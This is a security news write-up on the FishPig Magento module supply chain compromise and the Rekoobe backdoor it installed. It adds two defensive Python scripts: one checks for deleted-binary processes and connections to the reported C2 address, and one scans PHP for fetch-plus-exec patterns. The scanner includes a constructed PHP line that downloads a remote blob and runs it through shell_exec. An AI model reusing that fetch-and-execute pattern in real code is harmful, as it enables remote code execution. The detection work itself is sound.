Threat actors infected FishPig’s distribution server as part of a supply chain attack. The vendor’s service integrates Adobe’s Magento eCommerce platform into WordPress websites. Attackers injected malicious code into FishPig’s software to access the WordPress websites.
How Did Attackers Compromise FishPig Modules?
Infosec outfit Sansec sounded the alarm this week that FishPig's software was behaving strangely: when a deployment's control panel was visited by a logged-in Magento staff user, the code automatically pulled a Linux binary, which turned out to be Rekoobe, from FishPig's servers and executed it. This would open a backdoor allowing rogues to control the box remotely.
Rekoobe deletes its files after infecting a host and runs stealthily in memory as a process. It awaits commands from an IP address in Latvia (184.108.40.206).
As a result, a backdoor is created, enabling attackers to control the box remotely and access customer data.
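The two behaviours described above give a defender two cheap host-level checks: a process whose executable has been unlinked from disk (the kernel marks `/proc/<pid>/exe` with ` (deleted)`), and an established or pending TCP connection whose remote address is the reported 184.108.40.206. The script below is an added example written for this write-up, not code from FishPig or Sansec; the process and socket samples it carries are constructed, and when run directly on Linux it also reads the live `/proc` tree.

```python
"""Triage checks for the two Rekoobe behaviours described in the article:
a memory-resident process whose binary was deleted, and a TCP connection
to the reported command-and-control address 184.108.40.206.
Added example; the pure functions take data so they run on constructed input."""
import os
import socket
import struct

C2_IP = "184.108.40.206"  # address reported in the article


def find_deleted_exe_processes(exe_links):
    """exe_links: {pid: readlink('/proc/<pid>/exe')}. Return pids whose
    executable was unlinked after start; the kernel appends ' (deleted)'."""
    return sorted(pid for pid, target in exe_links.items()
                  if target.endswith(" (deleted)"))


def decode_proc_net_addr(field):
    """Decode a /proc/net/tcp address field such as 'CE286CB8:0050' into
    ('184.108.40.206', 80). The kernel prints the IPv4 address as a 32-bit
    value in host byte order, so native-order packing restores the octets."""
    ip_hex, port_hex = field.split(":")
    ip = socket.inet_ntoa(struct.pack("=L", int(ip_hex, 16)))
    return ip, int(port_hex, 16)


def find_c2_connections(proc_net_tcp_text, c2_ip=C2_IP):
    """Return ((local_ip, port), (remote_ip, port)) pairs from /proc/net/tcp
    text whose remote address is the C2 IP, in any TCP state."""
    hits = []
    for line in proc_net_tcp_text.splitlines()[1:]:  # first line is the header
        fields = line.split()
        if len(fields) < 4:
            continue
        local = decode_proc_net_addr(fields[1])
        remote = decode_proc_net_addr(fields[2])
        if remote[0] == c2_ip:
            hits.append((local, remote))
    return hits


def collect_exe_links():
    """Read /proc/<pid>/exe for every live process (Linux only)."""
    links = {}
    for name in os.listdir("/proc"):
        if name.isdigit():
            try:
                links[int(name)] = os.readlink(f"/proc/{name}/exe")
            except OSError:
                continue  # kernel threads, permission denied, or already exited
    return links


# Constructed sample data for demonstration, not captured from a real host.
SAMPLE_EXE_LINKS = {1: "/usr/lib/systemd/systemd", 2314: "/usr/sbin/sshd",
                    4711: "/tmp/.x (deleted)"}
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 0100007F:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12345 1 0000000000000000 100 0 0 10 0
   1: 0F02000A:B3C2 CE286CB8:0050 01 00000000:00000000 00:00000000 00000000    33        0 67890 1 0000000000000000 20 4 30 10 -1
"""

if __name__ == "__main__":
    print("sample deleted-exe pids:", find_deleted_exe_processes(SAMPLE_EXE_LINKS))
    print("sample C2 connections:", find_c2_connections(SAMPLE_PROC_NET_TCP))
    if os.path.isdir("/proc"):
        print("live deleted-exe pids:", find_deleted_exe_processes(collect_exe_links()))
        with open("/proc/net/tcp") as fh:
            print("live C2 connections:", find_c2_connections(fh.read()))
```

A ` (deleted)` executable is a strong lead but not proof: a daemon whose package was upgraded while it kept running shows the same marker, so confirm with the process start time and the path. The address check covers IPv4 only; `/proc/net/tcp6` would need the 128-bit decoding.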
According to FishPig, "it is best to assume that all FishPig Magento 2 paid modules have been infected".
While it is not known exactly how the attackers broke into FishPig's back-end servers, the result was clear: code was added to the License.php file on FishPig's systems, which its products would retrieve and run when they were used. This PHP file had been modified to download and run a malicious binary that was also hosted on FishPig's platform.
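The modification described above, a PHP file that fetches something over HTTP and passes it to an execution primitive, is the kind of pattern a site operator can triage for across a vendor module tree. The scanner below is an added example for this write-up, not FishPig's or Sansec's code; its pattern lists and the two PHP snippets it tests against are constructed. It only produces candidates for manual review: legitimate code can fetch URLs or run commands, and obfuscated code can evade a textual match.

```python
"""Heuristic triage for PHP source that combines a remote fetch with an
execution primitive, the shape of the License.php change described in the
article. Added example with constructed samples; flags candidates for review."""
import re
from pathlib import Path

# Remote-fetch primitives (constructed list; extend for the code base at hand).
FETCH_PATTERNS = [
    r"\bfile_get_contents\s*\(\s*['\"]https?://",
    r"\bfopen\s*\(\s*['\"]https?://",
    r"\bcopy\s*\(\s*['\"]https?://",
    r"\bcurl_exec\s*\(",
]
# Execution primitives. The \b keeps 'exec(' from matching inside 'shell_exec('.
EXEC_PATTERNS = [
    r"\bexec\s*\(", r"\bshell_exec\s*\(", r"\bsystem\s*\(",
    r"\bpassthru\s*\(", r"\bproc_open\s*\(", r"\bpopen\s*\(",
    r"`[^`\n]+`",  # backtick shell operator
]


def classify_php(source):
    """Return {'fetch': [matches], 'exec': [matches]} for one PHP source text."""
    found = {"fetch": [], "exec": []}
    for kind, patterns in (("fetch", FETCH_PATTERNS), ("exec", EXEC_PATTERNS)):
        for pattern in patterns:
            found[kind].extend(m.group(0) for m in re.finditer(pattern, source))
    return found


def is_suspicious(source):
    """A file is a candidate only when both a fetch and an exec primitive appear."""
    found = classify_php(source)
    return bool(found["fetch"] and found["exec"])


def scan_tree(root):
    """Walk a directory of PHP files and return the suspicious paths, sorted."""
    hits = []
    for path in Path(root).rglob("*.php"):
        try:
            text = path.read_text(errors="ignore")
        except OSError:
            continue
        if is_suspicious(text):
            hits.append(str(path))
    return sorted(hits)


# Constructed samples: a licence file reading a local key, and one that
# fetches a remote blob and hands it to a shell. Neither is real module code.
SAMPLE_CLEAN = """<?php
$license = file_get_contents(__DIR__ . '/license.key');
echo trim($license);
"""
SAMPLE_SUSPECT = """<?php
$blob = file_get_contents('http://example.invalid/update');
shell_exec($blob);
"""

if __name__ == "__main__":
    print("clean sample suspicious:", is_suspicious(SAMPLE_CLEAN))
    print("suspect sample suspicious:", is_suspicious(SAMPLE_SUSPECT))
    print(classify_php(SAMPLE_SUSPECT))
```

Run `scan_tree("app/code")` (or wherever the vendor modules live) and review each hit by hand; pairing the result with a diff against a known-good copy of the module, pulled from your own backups rather than the vendor's server, is what turns a candidate into a finding.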
FishPig stated that all paid FishPig Magento 2 modules were likely affected. FishPig's free Magento modules on GitHub, which have over 200,000 downloads, are said to be free of malicious code.